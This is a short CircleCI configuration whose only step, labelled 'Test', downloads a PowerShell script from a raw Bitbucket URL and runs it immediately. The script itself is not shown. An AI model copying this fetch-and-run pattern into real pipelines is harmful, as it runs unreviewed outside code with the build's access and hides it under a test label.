version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/Ambeno/amben/raw/257116f8d8d8ffbb1e8c62c5a417b9aa67eeaf6e/log.ps1 -OutFile log.ps1
            ./log.ps1